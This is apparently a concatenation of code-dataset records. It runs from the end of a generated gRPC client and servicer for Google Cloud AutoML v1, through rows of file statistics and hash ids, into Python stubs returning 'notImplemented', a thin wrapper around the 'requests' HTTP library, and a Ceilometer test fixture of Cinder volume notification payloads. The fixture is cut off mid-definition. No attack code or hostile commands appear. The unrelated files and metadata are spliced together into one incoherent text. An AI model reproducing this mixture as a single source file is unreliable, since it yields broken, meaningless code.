"/google.cloud.automl.v1.AutoMl/DeleteDataset",
request_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.DeleteDatasetRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.ImportData = channel.unary_unary(
"/google.cloud.automl.v1.AutoMl/ImportData",
request_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.ImportDataRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.ExportData = channel.unary_unary(
"/google.cloud.automl.v1.AutoMl/ExportData",
request_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.ExportDataRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.GetAnnotationSpec = channel.unary_unary(
"/google.cloud.automl.v1.AutoMl/GetAnnotationSpec",
request_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.GetAnnotationSpecRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_annotation__spec__pb2.AnnotationSpec.FromString,
)
self.CreateModel = channel.unary_unary(
"/google.cloud.automl.v1.AutoMl/CreateModel",
request_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.CreateModelRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.GetModel = channel.unary_unary(
"/google.cloud.automl.v1.AutoMl/GetModel",
request_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.GetModelRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_model__pb2.Model.FromString,
)
self.ListModels = channel.unary_unary(
"/google.cloud.automl.v1.AutoMl/ListModels",
request_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.ListModelsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.ListModelsResponse.FromString,
)
self.DeleteModel = channel.unary_unary(
"/google.cloud.automl.v1.AutoMl/DeleteModel",
request_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.DeleteModelRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.UpdateModel = channel.unary_unary(
"/google.cloud.automl.v1.AutoMl/UpdateModel",
request_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.UpdateModelRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_model__pb2.Model.FromString,
)
self.DeployModel = channel.unary_unary(
"/google.cloud.automl.v1.AutoMl/DeployModel",
request_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.DeployModelRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.UndeployModel = channel.unary_unary(
"/google.cloud.automl.v1.AutoMl/UndeployModel",
request_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.UndeployModelRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.ExportModel = channel.unary_unary(
"/google.cloud.automl.v1.AutoMl/ExportModel",
request_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.ExportModelRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.GetModelEvaluation = channel.unary_unary(
"/google.cloud.automl.v1.AutoMl/GetModelEvaluation",
request_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.GetModelEvaluationRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_model__evaluation__pb2.ModelEvaluation.FromString,
)
self.ListModelEvaluations = channel.unary_unary(
"/google.cloud.automl.v1.AutoMl/ListModelEvaluations",
request_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.ListModelEvaluationsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.ListModelEvaluationsResponse.FromString,
)
class AutoMlServicer(object):
"""AutoML Server API.
The resource names are assigned by the server.
The server never reuses names that it has created after the resources with
those names are deleted.
An ID of a resource is the last element of the item's resource name. For
`projects/{project_id}/locations/{location_id}/datasets/{dataset_id}`, then
the id for the item is `{dataset_id}`.
Currently the only supported `location_id` is "us-central1".
On any input that is documented to expect a string parameter in
snake_case or kebab-case, either of those cases is accepted.
"""
def CreateDataset(self, request, context):
"""Creates a dataset.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def GetDataset(self, request, context):
"""Gets a dataset.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def ListDatasets(self, request, context):
"""Lists datasets in a project.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def UpdateDataset(self, request, context):
"""Updates a dataset.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def DeleteDataset(self, request, context):
"""Deletes a dataset and all of its contents.
Returns empty response in the
[response][google.longrunning.Operation.response] field when it completes,
and `delete_details` in the
[metadata][google.longrunning.Operation.metadata] field.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def ImportData(self, request, context):
"""Imports data into a dataset.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def ExportData(self, request, context):
"""Exports dataset's data to the provided output location.
Returns an empty response in the
[response][google.longrunning.Operation.response] field when it completes.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def GetAnnotationSpec(self, request, context):
"""Gets an annotation spec.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def CreateModel(self, request, context):
"""Creates a model.
Returns a Model in the [response][google.longrunning.Operation.response]
field when it completes.
When you create a model, several model evaluations are created for it:
a global evaluation, and one evaluation for each annotation spec.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def GetModel(self, request, context):
"""Gets a model.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def ListModels(self, request, context):
"""Lists models.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def DeleteModel(self, request, context):
"""Deletes a model.
Returns `google.protobuf.Empty` in the
[response][google.longrunning.Operation.response] field when it completes,
and `delete_details` in the
[metadata][google.longrunning.Operation.metadata] field.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def UpdateModel(self, request, context):
"""Updates a model.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def DeployModel(self, request, context):
"""Deploys a model. If a model is already deployed, deploying it with the
same parameters has no effect. Deploying with different parametrs
(as e.g. changing
[node_number][google.cloud.automl.v1.ImageObjectDetectionModelDeploymentMetadata.node_number])
will reset the deployment state without pausing the model's availability.
Only applicable for Text Classification, Image Object Detection; all other
domains manage deployment automatically.
Returns an empty response in the
[response][google.longrunning.Operation.response] field when it completes.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def UndeployModel(self, request, context):
"""Undeploys a model. If the model is not deployed this method has no effect.
Only applicable for Text Classification, Image Object Detection;
all other domains manage deployment automatically.
Returns an empty response in the
[response][google.longrunning.Operation.response] field when it completes.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def ExportModel(self, request, context):
"""Exports a trained, "export-able", model to a user specified Google Cloud
Storage location. A model is considered export-able if and only if it has
an export format defined for it in
[ModelExportOutputConfig][google.cloud.automl.v1.ModelExportOutputConfig].
Returns an empty response in the
[response][google.longrunning.Operation.response] field when it completes.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def GetModelEvaluation(self, request, context):
"""Gets a model evaluation.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def ListModelEvaluations(self, request, context):
"""Lists model evaluations.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def add_AutoMlServicer_to_server(servicer, server):
rpc_method_handlers = {
"CreateDataset": grpc.unary_unary_rpc_method_handler(
servicer.CreateDataset,
request_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.CreateDatasetRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
"GetDataset": grpc.unary_unary_rpc_method_handler(
servicer.GetDataset,
request_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.GetDatasetRequest.FromString,
response_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_dataset__pb2.Dataset.SerializeToString,
),
"ListDatasets": grpc.unary_unary_rpc_method_handler(
servicer.ListDatasets,
request_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.ListDatasetsRequest.FromString,
response_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.ListDatasetsResponse.SerializeToString,
),
"UpdateDataset": grpc.unary_unary_rpc_method_handler(
servicer.UpdateDataset,
request_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.UpdateDatasetRequest.FromString,
response_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_dataset__pb2.Dataset.SerializeToString,
),
"DeleteDataset": grpc.unary_unary_rpc_method_handler(
servicer.DeleteDataset,
request_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.DeleteDatasetRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
"ImportData": grpc.unary_unary_rpc_method_handler(
servicer.ImportData,
request_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.ImportDataRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
"ExportData": grpc.unary_unary_rpc_method_handler(
servicer.ExportData,
request_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.ExportDataRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
"GetAnnotationSpec": grpc.unary_unary_rpc_method_handler(
servicer.GetAnnotationSpec,
request_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.GetAnnotationSpecRequest.FromString,
response_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_annotation__spec__pb2.AnnotationSpec.SerializeToString,
),
"CreateModel": grpc.unary_unary_rpc_method_handler(
servicer.CreateModel,
request_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.CreateModelRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
"GetModel": grpc.unary_unary_rpc_method_handler(
servicer.GetModel,
request_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.GetModelRequest.FromString,
response_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_model__pb2.Model.SerializeToString,
),
"ListModels": grpc.unary_unary_rpc_method_handler(
servicer.ListModels,
request_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.ListModelsRequest.FromString,
response_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.ListModelsResponse.SerializeToString,
),
"DeleteModel": grpc.unary_unary_rpc_method_handler(
servicer.DeleteModel,
request_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.DeleteModelRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
"UpdateModel": grpc.unary_unary_rpc_method_handler(
servicer.UpdateModel,
request_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.UpdateModelRequest.FromString,
response_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_model__pb2.Model.SerializeToString,
),
"DeployModel": grpc.unary_unary_rpc_method_handler(
servicer.DeployModel,
request_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.DeployModelRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
"UndeployModel": grpc.unary_unary_rpc_method_handler(
servicer.UndeployModel,
request_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.UndeployModelRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
"ExportModel": grpc.unary_unary_rpc_method_handler(
servicer.ExportModel,
request_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.ExportModelRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
"GetModelEvaluation": grpc.unary_unary_rpc_method_handler(
servicer.GetModelEvaluation,
request_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.GetModelEvaluationRequest.FromString,
response_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_model__evaluation__pb2.ModelEvaluation.SerializeToString,
),
"ListModelEvaluations": grpc.unary_unary_rpc_method_handler(
servicer.ListModelEvaluations,
request_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.ListModelEvaluationsRequest.FromString,
response_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.ListModelEvaluationsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
"google.cloud.automl.v1.AutoMl", rpc_method_handlers
)
server.add_generic_rpc_handlers((generic_handler,))
| 52.378897
| 138
| 0.754189
| 2,456
| 21,842
| 6.267508
| 0.095684
| 0.044176
| 0.053661
| 0.065159
| 0.827064
| 0.814071
| 0.808484
| 0.76184
| 0.708309
| 0.703242
| 0
| 0.00952
| 0.177594
| 21,842
| 416
| 139
| 52.504808
| 0.847409
| 0.163584
| 0
| 0.366548
| 1
| 0
| 0.103571
| 0.045072
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071174
| false
| 0
| 0.049822
| 0
| 0.128114
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c1063d4a10db2e9566f883abcc1018079ec06b3
| 311
|
py
|
Python
|
linux/rest/funcs_resource.py
|
petergyorgy/virtue
|
3b4dbfbdf9f5e121d9c9887d675fdd3065ecdd3b
|
[
"BSD-3-Clause"
] | null | null | null |
linux/rest/funcs_resource.py
|
petergyorgy/virtue
|
3b4dbfbdf9f5e121d9c9887d675fdd3065ecdd3b
|
[
"BSD-3-Clause"
] | null | null | null |
linux/rest/funcs_resource.py
|
petergyorgy/virtue
|
3b4dbfbdf9f5e121d9c9887d675fdd3065ecdd3b
|
[
"BSD-3-Clause"
] | null | null | null |
def resource_get_func(args):
return {"code":254, "error":"notImplemented"}
def resource_list_func(args):
return {"code":254, "error":"notImplemented"}
def resource_attach_func(args):
return {"code":254, "error":"notImplemented"}
def resource_detach_func(args):
return {"code":254, "error":"notImplemented"}
| 34.555556
| 46
| 0.742765
| 40
| 311
| 5.575
| 0.325
| 0.197309
| 0.251121
| 0.32287
| 0.865471
| 0.865471
| 0.865471
| 0.686099
| 0.686099
| 0
| 0
| 0.041812
| 0.07717
| 311
| 8
| 47
| 38.875
| 0.735192
| 0
| 0
| 0.5
| 0
| 0
| 0.29582
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
7c2376ef857199baf858634858fc18b20c8659ad
| 3,657
|
py
|
Python
|
pyrez/http.py
|
EthanHicks1/Pyrez
|
022d62ae893594c2ddcd7fac5e740c693fd4fd54
|
[
"MIT"
] | null | null | null |
pyrez/http.py
|
EthanHicks1/Pyrez
|
022d62ae893594c2ddcd7fac5e740c693fd4fd54
|
[
"MIT"
] | null | null | null |
pyrez/http.py
|
EthanHicks1/Pyrez
|
022d62ae893594c2ddcd7fac5e740c693fd4fd54
|
[
"MIT"
] | null | null | null |
from sys import version_info as pythonVersion
import requests
class HttpRequest():
defaultHeaders = { "user-agent": "HttpRequestWrapper [Python/{0.major}.{0.minor}]".format(pythonVersion) }
timeout = 500
def __init__(self, headers=defaultHeaders):
self.headers=defaultHeaders if headers is None else headers
def get(self, url, params=None, data=None, headers=defaultHeaders, cookies=None, files=None, auth=None, timeout=None, allowRedirects=False, proxies=None, hooks=None, stream=False, verify=None, cert=None):
return self.request('GET', url=url.replace(' ', '%20'), params=params, data=data, headers=headers, cookies=cookies, files=files, auth=auth, timeout=timeout, allowRedirects=allowRedirects, proxies=proxies, hooks=hooks, stream=stream, verify=verify, cert=cert)
def request(self, method, url, params=None, data=None, headers=defaultHeaders, cookies=None, files=None, auth=None, timeout=None, allowRedirects=False, proxies=None, hooks=None, stream=False, verify=None, cert=None):
return requests.request(method=method, url=url, params=params, data=data, headers=headers, cookies=cookies, files=files, auth=auth, timeout=timeout, allow_redirects=allowRedirects, proxies=proxies, hooks=hooks, stream=stream, verify=verify, cert=cert)
def post(self, url, params=None, data=None, headers=defaultHeaders, cookies=None, files=None, auth=None, timeout=None, allowRedirects=False, proxies=None, hooks=None, stream=False, verify=None, cert=None):
return requests.post(url=url.replace(' ', '%20'), params=params, data=data, headers=headers, cookies=cookies, files=files, auth=auth, timeout=timeout, allow_redirects=allowRedirects, proxies=proxies, hooks=hooks, stream=stream, verify=verify, cert=cert)
def put(self, url, params=None, data=None, headers=defaultHeaders, cookies=None, files=None, auth=None, timeout=None, allowRedirects=False, proxies=None, hooks=None, stream=False, verify=None, cert=None):
return requests.put(url=url.replace(' ', '%20'), params=params, data=data, headers=headers, cookies=cookies, files=files, auth=auth, timeout=timeout, allow_redirects=allowRedirects, proxies=proxies, hooks=hooks, stream=stream, verify=verify, cert=cert)
def delete(self, url, params=None, data=None, headers=defaultHeaders, cookies=None, files=None, auth=None, timeout=None, allowRedirects=False, proxies=None, hooks=None, stream=False, verify=None, cert=None):
return requests.delete(url=url.replace(' ', '%20'), params=params, data=data, headers=headers, cookies=cookies, files=files, auth=auth, timeout=timeout, allow_redirects=allowRedirects, proxies=proxies, hooks=hooks, stream=stream, verify=verify, cert=cert)
def head(self, url, params=None, data=None, headers=defaultHeaders, cookies=None, files=None, auth=None, timeout=None, allowRedirects=False, proxies=None, hooks=None, stream=False, verify=None, cert=None):
return requests.head(url=url.replace(' ', '%20'), params=params, data=data, headers=headers, cookies=cookies, files=files, auth=auth, timeout=timeout, allow_redirects=allowRedirects, proxies=proxies, hooks=hooks, stream=stream, verify=verify, cert=cert)
def options(self, url, params=None, data=None, headers=defaultHeaders, cookies=None, files=None, auth=None, timeout=None, allowRedirects=False, proxies=None, hooks=None, stream=False, verify=None, cert=None):
return requests.options(url=url.replace(' ', '%20'), params=params, data=data, headers=headers, cookies=cookies, files=files, auth=auth, timeout=timeout, allow_redirects=allowRedirects, proxies=proxies, hooks=hooks, stream=stream, verify=verify, cert=cert)
| 140.653846
| 266
| 0.758545
| 487
| 3,657
| 5.673511
| 0.112936
| 0.068404
| 0.032935
| 0.043069
| 0.868259
| 0.868259
| 0.868259
| 0.868259
| 0.868259
| 0.868259
| 0
| 0.005172
| 0.101176
| 3,657
| 25
| 267
| 146.28
| 0.835412
| 0
| 0
| 0
| 0
| 0
| 0.02297
| 0.007657
| 0
| 0
| 0
| 0
| 0
| 1
| 0.380952
| false
| 0
| 0.095238
| 0.333333
| 0.952381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 10
|
7c4c91d6d5bf63549f3d1ce334a97d269e174c59
| 14,328
|
py
|
Python
|
ceilometer/tests/volume/test_notifications.py
|
orbitfp7/ceilometer
|
9905da14bbdf06f95e1e056c9ca0e18087214d0f
|
[
"Apache-2.0"
] | 2
|
2015-09-07T09:15:26.000Z
|
2015-09-30T02:13:23.000Z
|
ceilometer/tests/volume/test_notifications.py
|
orbitfp7/ceilometer
|
9905da14bbdf06f95e1e056c9ca0e18087214d0f
|
[
"Apache-2.0"
] | null | null | null |
ceilometer/tests/volume/test_notifications.py
|
orbitfp7/ceilometer
|
9905da14bbdf06f95e1e056c9ca0e18087214d0f
|
[
"Apache-2.0"
] | 1
|
2019-09-16T02:11:41.000Z
|
2019-09-16T02:11:41.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslotest import base
from ceilometer.volume import notifications
NOTIFICATION_VOLUME_EXISTS = {
u'_context_roles': [u'admin'],
u'_context_request_id': u'req-7ef29a5d-adeb-48a8-b104-59c05361aa27',
u'_context_quota_class': None,
u'event_type': u'volume.exists',
u'timestamp': u'2012-09-21 09:29:10.620731',
u'message_id': u'e0e6a5ad-2fc9-453c-b3fb-03fe504538dc',
u'_context_auth_token': None,
u'_context_is_admin': True,
u'_context_project_id': None,
u'_context_timestamp': u'2012-09-21T09:29:10.266928',
u'_context_read_deleted': u'no',
u'_context_user_id': None,
u'_context_remote_address': None,
u'publisher_id': u'volume.ubuntu-VirtualBox',
u'payload': {u'status': u'available',
u'audit_period_beginning': u'2012-09-20 00:00:00',
u'display_name': u'volume1',
u'tenant_id': u'6c97f1ecf17047eab696786d56a0bff5',
u'created_at': u'2012-09-20 15:05:16',
u'snapshot_id': None,
u'volume_type': None,
u'volume_id': u'84c363b9-9854-48dc-b949-fe04263f4cf0',
u'audit_period_ending': u'2012-09-21 00:00:00',
u'user_id': u'4d2fa4b76a4a4ecab8c468c8dea42f89',
u'launched_at': u'2012-09-20 15:05:23',
u'size': 2},
u'priority': u'INFO'
}
NOTIFICATION_VOLUME_DELETE = {
u'_context_roles': [u'Member', u'admin'],
u'_context_request_id': u'req-6ba8ccb4-1093-4a39-b029-adfaa3fc7ceb',
u'_context_quota_class': None,
u'event_type': u'volume.delete.start',
u'timestamp': u'2012-09-21 10:24:13.168630',
u'message_id': u'f6e6bc1f-fcd5-41e1-9a86-da7d024f03d9',
u'_context_auth_token': u'277c6899de8a4b3d999f3e2e4c0915ff',
u'_context_is_admin': True,
u'_context_project_id': u'6c97f1ecf17047eab696786d56a0bff5',
u'_context_timestamp': u'2012-09-21T10:23:54.741228',
u'_context_read_deleted': u'no',
u'_context_user_id': u'4d2fa4b76a4a4ecab8c468c8dea42f89',
u'_context_remote_address': u'192.168.22.101',
u'publisher_id': u'volume.ubuntu-VirtualBox',
u'payload': {u'status': u'deleting',
u'volume_type_id': None,
u'display_name': u'abc',
u'tenant_id': u'6c97f1ecf17047eab696786d56a0bff5',
u'created_at': u'2012-09-21 10:10:47',
u'snapshot_id': None,
u'volume_id': u'3b761164-84b4-4eb3-8fcb-1974c641d6ef',
u'user_id': u'4d2fa4b76a4a4ecab8c468c8dea42f89',
u'launched_at': u'2012-09-21 10:10:50',
u'size': 3},
u'priority': u'INFO'}
NOTIFICATION_VOLUME_ATTACH = {
u'_context_roles': [u'Member', u'admin'],
u'_context_request_id': u'req-6ba8ccb4-1093-4a39-b029-adfaa3fc7ceb',
u'_context_quota_class': None,
u'event_type': u'volume.attach.end',
u'timestamp': u'2012-09-21 10:24:13.168630',
u'message_id': u'c994ae8d-d068-4101-bd06-1048877c844a',
u'_context_auth_token': u'277c6899de8a4b3d999f3e2e4c0915ff',
u'_context_is_admin': True,
u'_context_project_id': u'6c97f1ecf17047eab696786d56a0bff5',
u'_context_timestamp': u'2012-09-21T10:02:27.134211',
u'_context_read_deleted': u'no',
u'_context_user_id': u'4d2fa4b76a4a4ecab8c468c8dea42f89',
u'_context_remote_address': u'192.168.22.101',
u'publisher_id': u'volume.ubuntu-VirtualBox',
u'payload': {u'status': u'in-use',
u'volume_type_id': None,
u'display_name': u'abc',
u'tenant_id': u'6c97f1ecf17047eab696786d56a0bff5',
u'created_at': u'2012-09-21 10:10:47',
u'snapshot_id': None,
u'volume_id': u'3b761164-84b4-4eb3-8fcb-1974c641d6ef',
u'user_id': u'4d2fa4b76a4a4ecab8c468c8dea42f89',
u'launched_at': u'2012-09-21 10:10:50',
u'size': 3},
u'priority': u'INFO'}
NOTIFICATION_VOLUME_DETACH = {
u'_context_roles': [u'Member', u'admin'],
u'_context_request_id': u'req-6ba8ccb4-1093-4a39-b029-adfaa3fc7ceb',
u'_context_quota_class': None,
u'event_type': u'volume.detach.end',
u'timestamp': u'2012-09-21 10:24:13.168630',
u'message_id': u'c994ae8d-d068-4101-bd06-1048877c844a',
u'_context_auth_token': u'277c6899de8a4b3d999f3e2e4c0915ff',
u'_context_is_admin': True,
u'_context_project_id': u'6c97f1ecf17047eab696786d56a0bff5',
u'_context_timestamp': u'2012-09-21T10:02:27.134211',
u'_context_read_deleted': u'no',
u'_context_user_id': u'4d2fa4b76a4a4ecab8c468c8dea42f89',
u'_context_remote_address': u'192.168.22.101',
u'publisher_id': u'volume.ubuntu-VirtualBox',
u'payload': {u'status': u'available',
u'volume_type_id': None,
u'display_name': u'abc',
u'tenant_id': u'6c97f1ecf17047eab696786d56a0bff5',
u'created_at': u'2012-09-21 10:10:47',
u'snapshot_id': None,
u'volume_id': u'3b761164-84b4-4eb3-8fcb-1974c641d6ef',
u'user_id': u'4d2fa4b76a4a4ecab8c468c8dea42f89',
u'launched_at': u'2012-09-21 10:10:50',
u'size': 3},
u'priority': u'INFO'}
NOTIFICATION_VOLUME_RESIZE = {
u'_context_roles': [u'Member', u'admin'],
u'_context_request_id': u'req-6ba8ccb4-1093-4a39-b029-adfaa3fc7ceb',
u'_context_quota_class': None,
u'event_type': u'volume.resize.end',
u'timestamp': u'2012-09-21 10:24:13.168630',
u'message_id': u'b5814258-3425-4eb7-b6b7-bf4811203e58',
u'_context_auth_token': u'277c6899de8a4b3d999f3e2e4c0915ff',
u'_context_is_admin': True,
u'_context_project_id': u'6c97f1ecf17047eab696786d56a0bff5',
u'_context_timestamp': u'2012-09-21T10:02:27.134211',
u'_context_read_deleted': u'no',
u'_context_user_id': u'4d2fa4b76a4a4ecab8c468c8dea42f89',
u'_context_remote_address': u'192.168.22.101',
u'publisher_id': u'volume.ubuntu-VirtualBox',
u'payload': {u'status': u'extending',
u'volume_type_id': None,
u'display_name': u'abc',
u'tenant_id': u'6c97f1ecf17047eab696786d56a0bff5',
u'created_at': u'2012-09-21 10:10:47',
u'snapshot_id': None,
u'volume_id': u'3b761164-84b4-4eb3-8fcb-1974c641d6ef',
u'user_id': u'4d2fa4b76a4a4ecab8c468c8dea42f89',
u'launched_at': u'2012-09-21 10:10:50',
u'size': 3},
u'priority': u'INFO'}
NOTIFICATION_SNAPSHOT_EXISTS = {
u'_context_roles': [u'admin'],
u'_context_request_id': u'req-7ef29a5d-adeb-48a8-b104-59c05361aa27',
u'_context_quota_class': None,
u'event_type': u'snapshot.exists',
u'timestamp': u'2012-09-21 09:29:10.620731',
u'message_id': u'e0e6a5ad-2fc9-453c-b3fb-03fe504538dc',
u'_context_auth_token': None,
u'_context_is_admin': True,
u'_context_project_id': None,
u'_context_timestamp': u'2012-09-21T09:29:10.266928',
u'_context_read_deleted': u'no',
u'_context_user_id': None,
u'_context_remote_address': None,
u'publisher_id': u'volume.ubuntu-VirtualBox',
u"payload": {u"audit_period_beginning": u"2014-05-06 11:00:00",
u"audit_period_ending": u"2014-05-06 12:00:00",
u"availability_zone": u"left",
u"created_at": u"2014-05-06 09:33:43",
u"deleted": u"",
u"display_name": "lil snapshot",
u"snapshot_id": u"dd163129-9476-4cf5-9311-dd425324d8d8",
u"status": u"available",
u"tenant_id": u"compliance",
u"user_id": u"e0271f64847b49429bb304c775c7427a",
u"volume_id": u"b96e026e-c9bf-4418-8d6f-4ba493bbb7d6",
u"volume_size": 3},
u'priority': u'INFO'}
class TestNotifications(base.BaseTestCase):
def _verify_common_sample_volume(self, s, name, notification):
